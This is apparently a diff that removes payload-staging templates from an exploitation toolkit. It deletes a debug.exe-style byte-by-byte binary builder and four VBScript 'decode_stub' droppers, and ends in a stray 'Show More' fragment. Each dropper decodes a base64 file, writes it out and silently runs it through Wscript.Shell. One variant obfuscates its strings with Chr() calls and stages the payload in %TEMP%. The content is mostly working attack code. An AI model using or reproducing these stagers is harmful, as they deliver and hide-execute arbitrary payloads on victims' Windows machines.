-echo e f8e 65 >>decoder_stub
-echo e f90 78 >>decoder_stub
-echo e f92 32 >>decoder_stub
-echo e f94 62 >>decoder_stub
-echo e f96 69 >>decoder_stub
-echo e f98 6e >>decoder_stub
-echo e f9a 2e >>decoder_stub
-echo e f9c 65 >>decoder_stub
-echo e f9e 78 >>decoder_stub
-echo e fa0 65 >>decoder_stub
-echo e fa4 30 >>decoder_stub
-echo e fa6 08 >>decoder_stub
-echo e fa8 01 >>decoder_stub
-echo e faa 50 >>decoder_stub
-echo e fac 72 >>decoder_stub
-echo e fae 6f >>decoder_stub
-echo e fb0 64 >>decoder_stub
-echo e fb2 75 >>decoder_stub
-echo e fb4 63 >>decoder_stub
-echo e fb6 74 >>decoder_stub
-echo e fb8 4e >>decoder_stub
-echo e fba 61 >>decoder_stub
-echo e fbc 6d >>decoder_stub
-echo e fbe 65 >>decoder_stub
-echo e fc4 68 >>decoder_stub
-echo e fc6 65 >>decoder_stub
-echo e fc8 78 >>decoder_stub
-echo e fca 32 >>decoder_stub
-echo e fcc 62 >>decoder_stub
-echo e fce 69 >>decoder_stub
-echo e fd0 6e >>decoder_stub
-echo e fd4 34 >>decoder_stub
-echo e fd6 08 >>decoder_stub
-echo e fd8 01 >>decoder_stub
-echo e fda 50 >>decoder_stub
-echo e fdc 72 >>decoder_stub
-echo e fde 6f >>decoder_stub
-echo e fe0 64 >>decoder_stub
-echo e fe2 75 >>decoder_stub
-echo e fe4 63 >>decoder_stub
-echo e fe6 74 >>decoder_stub
-echo e fe8 56 >>decoder_stub
-echo e fea 65 >>decoder_stub
-echo e fec 72 >>decoder_stub
-echo e fee 73 >>decoder_stub
-echo e ff0 69 >>decoder_stub
-echo e ff2 6f >>decoder_stub
-echo e ff4 6e >>decoder_stub
-echo e ff8 31 >>decoder_stub
-echo e ffa 2e >>decoder_stub
-echo e ffc 30 >>decoder_stub
-echo e ffe 2e >>decoder_stub
-echo e 1000 30 >>decoder_stub
-echo e 1002 2e >>decoder_stub
-echo e 1004 30 >>decoder_stub
-echo e 1008 38 >>decoder_stub
-echo e 100a 08 >>decoder_stub
-echo e 100c 01 >>decoder_stub
-echo e 100e 41 >>decoder_stub
-echo e 1010 73 >>decoder_stub
-echo e 1012 73 >>decoder_stub
-echo e 1014 65 >>decoder_stub
-echo e 1016 6d >>decoder_stub
-echo e 1018 62 >>decoder_stub
-echo e 101a 6c >>decoder_stub
-echo e 101c 79 >>decoder_stub
-echo e 101e 20 >>decoder_stub
-echo e 1020 56 >>decoder_stub
-echo e 1022 65 >>decoder_stub
-echo e 1024 72 >>decoder_stub
-echo e 1026 73 >>decoder_stub
-echo e 1028 69 >>decoder_stub
-echo e 102a 6f >>decoder_stub
-echo e 102c 6e >>decoder_stub
-echo e 1030 31 >>decoder_stub
-echo e 1032 2e >>decoder_stub
-echo e 1034 30 >>decoder_stub
-echo e 1036 2e >>decoder_stub
-echo e 1038 30 >>decoder_stub
-echo e 103a 2e >>decoder_stub
-echo e 103c 30 >>decoder_stub
-echo e 1040 ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e >>decoder_stub
-echo e 1054 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 >>decoder_stub
-echo e 1068 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 79 65 73 22 3f 3e 0d 0a >>decoder_stub
-echo e 107c 3c 61 73 73 65 6d 62 6c 79 20 78 6d 6c 6e 73 3d 22 75 72 6e >>decoder_stub
-echo e 1090 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 >>decoder_stub
-echo e 10a4 6f 6d 3a 61 73 6d 2e 76 31 22 20 6d 61 6e 69 66 65 73 74 56 >>decoder_stub
-echo e 10b8 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 0d 0a 20 20 3c 61 73 >>decoder_stub
-echo e 10cc 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 76 65 72 73 69 >>decoder_stub
-echo e 10e0 6f 6e 3d 22 31 2e 30 2e 30 2e 30 22 20 6e 61 6d 65 3d 22 4d >>decoder_stub
-echo e 10f4 79 41 70 70 6c 69 63 61 74 69 6f 6e 2e 61 70 70 22 2f 3e 0d >>decoder_stub
-echo e 1108 0a 20 20 3c 74 72 75 73 74 49 6e 66 6f 20 78 6d 6c 6e 73 3d >>decoder_stub
-echo e 111c 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f >>decoder_stub
-echo e 1130 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 3e 0d 0a 20 20 20 >>decoder_stub
-echo e 1144 20 3c 73 65 63 75 72 69 74 79 3e 0d 0a 20 20 20 20 20 20 3c >>decoder_stub
-echo e 1158 72 65 71 75 65 73 74 65 64 50 72 69 76 69 6c 65 67 65 73 20 >>decoder_stub
-echo e 116c 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d >>decoder_stub
-echo e 1180 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 33 22 >>decoder_stub
-echo e 1194 3e 0d 0a 20 20 20 20 20 20 20 20 3c 72 65 71 75 65 73 74 65 >>decoder_stub
-echo e 11a8 64 45 78 65 63 75 74 69 6f 6e 4c 65 76 65 6c 20 6c 65 76 65 >>decoder_stub
-echo e 11bc 6c 3d 22 61 73 49 6e 76 6f 6b 65 72 22 20 75 69 41 63 63 65 >>decoder_stub
-echo e 11d0 73 73 3d 22 66 61 6c 73 65 22 2f 3e 0d 0a 20 20 20 20 20 20 >>decoder_stub
-echo e 11e4 3c 2f 72 65 71 75 65 73 74 65 64 50 72 69 76 69 6c 65 67 65 >>decoder_stub
-echo e 11f8 73 3e 0d 0a 20 20 20 20 3c 2f 73 65 63 75 72 69 74 79 3e 0d >>decoder_stub
-echo e 120c 0a 20 20 3c 2f 74 72 75 73 74 49 6e 66 6f 3e 0d 0a 3c 2f 61 >>decoder_stub
-echo e 1220 73 73 65 6d 62 6c 79 3e 0d 0a >>decoder_stub
-echo e 1301 20 >>decoder_stub
-echo e 1304 0c >>decoder_stub
-echo e 1308 c0 38 >>decoder_stub
-echo w >>decoder_stub
-echo q >>decoder_stub
@@ -1,40 +0,0 @@
-echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
-echo Set file = fs.GetFile("ENCODED") >>decode_stub
-echo If file.Size Then >>decode_stub
-echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
-echo data = fd.ReadAll >>decode_stub
-echo data = Replace(data, vbCrLf, "") >>decode_stub
-echo data = base64_decode(data) >>decode_stub
-echo fd.Close >>decode_stub
-echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
-echo ofs.Write data >>decode_stub
-echo ofs.close >>decode_stub
-echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
-echo shell.run "DECODED", 0, false >>decode_stub
-echo Else >>decode_stub
-echo Wscript.Echo "The file is empty." >>decode_stub
-echo End If >>decode_stub
-echo Function base64_decode(byVal strIn) >>decode_stub
-echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
-echo For n = 1 To Len(strIn) Step 4 >>decode_stub
-echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
-echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
-echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
-echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
-echo If Not w2 Then _ >>decode_stub
-echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
-echo If  Not w3 Then _ >>decode_stub
-echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
-echo If Not w4 Then _ >>decode_stub
-echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
-echo Next >>decode_stub
-echo base64_decode = strOut >>decode_stub
-echo End Function >>decode_stub
-echo Function mimedecode(byVal strIn) >>decode_stub
-echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
-echo If Len(strIn) = 0 Then >>decode_stub
-echo mimedecode = -1 : Exit Function >>decode_stub
-echo Else >>decode_stub
-echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
-echo End If >>decode_stub
-echo End Function >>decode_stub
@@ -1,50 +0,0 @@
-echo Dim var_origLoc >>decode_stub
-echo var_origLoc = SetLocale(1033) >>decode_stub
-echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
-echo Set file = fs.GetFile("ENCODED") >>decode_stub
-echo If file.Size Then >>decode_stub
-echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
-echo data = fd.ReadAll >>decode_stub
-echo data = Replace(data, vbCrLf, "") >>decode_stub
-echo data = base64_decode(data) >>decode_stub
-echo fd.Close >>decode_stub
-echo Dim var_strmConv, var_writedir, var_writestream >>decode_stub
-echo var_writedir = "DECODED" >>decode_stub
-echo Set var_strmConv = CreateObject("ADODB.Stream") >>decode_stub
-echo var_strmConv.Type = 2 >>decode_stub
-echo var_strmConv.Charset = "x-ansi" >>decode_stub
-echo var_strmConv.Open >>decode_stub
-echo var_strmConv.WriteText data, 0 >>decode_stub
-echo var_strmConv.Position = 0 >>decode_stub
-echo var_strmConv.Type = 1 >>decode_stub
-echo var_strmConv.SaveToFile var_writedir, 2 >>decode_stub
-echo SetLocale(var_origLoc) >>decode_stub
-echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
-echo shell.run "DECODED", 0, false >>decode_stub
-echo Else >>decode_stub
-echo Wscript.Echo "The file is empty." >>decode_stub
-echo End If >>decode_stub
-echo Function base64_decode(byVal strIn) >>decode_stub
-echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
-echo For n = 1 To Len(strIn) Step 4 >>decode_stub
-echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
-echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
-echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
-echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
-echo If Not w2 Then _ >>decode_stub
-echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
-echo If  Not w3 Then _ >>decode_stub
-echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
-echo If Not w4 Then _ >>decode_stub
-echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
-echo Next >>decode_stub
-echo base64_decode = strOut >>decode_stub
-echo End Function >>decode_stub
-echo Function mimedecode(byVal strIn) >>decode_stub
-echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
-echo If Len(strIn) = 0 Then >>decode_stub
-echo mimedecode = -1 : Exit Function >>decode_stub
-echo Else >>decode_stub
-echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
-echo End If >>decode_stub
-echo End Function >>decode_stub
@@ -1,49 +0,0 @@
-echo Dim encodedFile, decodedFile, scriptingFS, scriptShell, emptyString, tempString, Base64Chars, tempDir >>decode_stub
-echo encodedFile = Chr(92)+CHRENCFILE >>decode_stub
-echo decodedFile = Chr(92)+CHRDECFILE >>decode_stub
-echo scriptingFS = Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116) >>decode_stub
-echo scriptShell = Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108) >>decode_stub
-echo emptyString = Chr(84)+Chr(104)+Chr(101)+Chr(32)+Chr(102)+Chr(105)+Chr(108)+Chr(101)+Chr(32)+Chr(105)+Chr(115)+Chr(32)+Chr(101)+Chr(109)+Chr(112)+Chr(116)+Chr(121)+Chr(46)>>decode_stub
-echo tempString  = Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37) >>decode_stub
-echo Base64Chars = Chr(65)+Chr(66)+Chr(67)+Chr(68)+Chr(69)+Chr(70)+Chr(71)+Chr(72)+Chr(73)+Chr(74)+Chr(75)+Chr(76)+Chr(77)+Chr(78)+Chr(79)+Chr(80)+Chr(81)+Chr(82)+Chr(83)+Chr(84)+Chr(85)+Chr(86)+Chr(87)+Chr(88)+Chr(89)+Chr(90)+Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+Chr(103)+Chr(104)+Chr(105)+Chr(106)+Chr(107)+Chr(108)+Chr(109)+Chr(110)+Chr(111)+Chr(112)+Chr(113)+Chr(114)+Chr(115)+Chr(116)+Chr(117)+Chr(118)+Chr(119)+Chr(120)+Chr(121)+Chr(122)+Chr(48)+Chr(49)+Chr(50)+Chr(51)+Chr(52)+Chr(53)+Chr(54)+Chr(55)+Chr(56)+Chr(57)+Chr(43)+Chr(47) >>decode_stub
-echo Set wshShell = CreateObject(scriptShell) >>decode_stub
-echo tempDir = wshShell.ExpandEnvironmentStrings(tempString) >>decode_stub
-echo Set fs = CreateObject(scriptingFS) >>decode_stub
-echo Set file = fs.GetFile(tempDir+encodedFile) >>decode_stub
-echo If file.Size Then >>decode_stub
-echo Set fd = fs.OpenTextFile(tempDir+encodedFile, 1) >>decode_stub
-echo data = fd.ReadAll >>decode_stub
-echo data = Replace(data, Chr(32)+vbCrLf, nil) >>decode_stub
-echo data = Replace(data, vbCrLf, nil) >>decode_stub
-echo data = base64_decode(data) >>decode_stub
-echo fd.Close >>decode_stub
-echo Set ofs = CreateObject(scriptingFS).OpenTextFile(tempDir+decodedFile, 2, True) >>decode_stub
-echo ofs.Write data >>decode_stub
-echo ofs.close >>decode_stub
-echo wshShell.run tempDir+decodedFile, 0, false >>decode_stub
-echo Else >>decode_stub
-echo Wscript.Echo emptyString >>decode_stub
-echo End If >>decode_stub
-echo Function base64_decode(byVal strIn) >>decode_stub
-echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
-echo For n = 1 To Len(strIn) Step 4 >>decode_stub
-echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
-echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
-echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
-echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
-echo If Not w2 Then _ >>decode_stub
-echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
-echo If  Not w3 Then _ >>decode_stub
-echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
-echo If Not w4 Then _ >>decode_stub
-echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
-echo Next >>decode_stub
-echo base64_decode = strOut >>decode_stub
-echo End Function >>decode_stub
-echo Function mimedecode(byVal strIn) >>decode_stub
-echo If Len(strIn) = 0 Then >>decode_stub
-echo mimedecode = -1 : Exit Function >>decode_stub
-echo Else >>decode_stub
-echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
-echo End If >>decode_stub
-echo End Function >>decode_stub
@@ -1,41 +0,0 @@
-echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
-echo Set file = fs.GetFile("ENCODED") >>decode_stub
-echo If file.Size Then >>decode_stub
-echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
-echo data = fd.ReadAll >>decode_stub
-echo data = Replace(data, vbCrLf, "") >>decode_stub
-echo data = base64_decode(data) >>decode_stub
-echo fd.Close >>decode_stub
-echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
-echo ofs.Write data >>decode_stub
-echo ofs.close >>decode_stub
-echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
-echo shell.run "DECODED", 0, false >>decode_stub
-echo Wscript.sleep(1000 * 60 * 5) >>decode_stub
-echo Else >>decode_stub
-echo Wscript.Echo "The file is empty." >>decode_stub
-echo End If >>decode_stub
-echo Function base64_decode(byVal strIn) >>decode_stub
-echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
-echo For n = 1 To Len(strIn) Step 4 >>decode_stub
-echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
-echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
-echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
-echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
-echo If Not w2 Then _ >>decode_stub
-echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
-echo If  Not w3 Then _ >>decode_stub
-echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
-echo If Not w4 Then _ >>decode_stub
-echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
-echo Next >>decode_stub
-echo base64_decode = strOut >>decode_stub
-echo End Function >>decode_stub
-echo Function mimedecode(byVal strIn) >>decode_stub
-echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
-echo If Len(strIn) = 0 Then >>decode_stub
-echo mimedecode = -1 : Exit Function >>decode_stub
-echo Else >>decode_stub
-echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
-echo End If >>decode_stub
-echo End Function >>decode_stub
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .3.1
 .4.1